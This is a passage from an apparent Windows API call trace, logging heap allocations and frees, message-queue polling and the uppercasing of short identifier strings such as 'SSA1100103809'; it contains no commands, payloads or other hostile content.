(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0088.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0088.080] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc4) returned 0x2a7a130 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0088.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0088.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0088.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc4) returned 0x2a93cd0 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0088.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0088.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0088.082] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0088.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0088.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0088.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0088.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0088.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0088.086] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0088.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0088.086] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0088.087] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0088.087] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.087] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0088.087] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.087] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0088.088] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0088.088] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.088] RtlAllocateHeap (HeapHandle=0x2af0000, 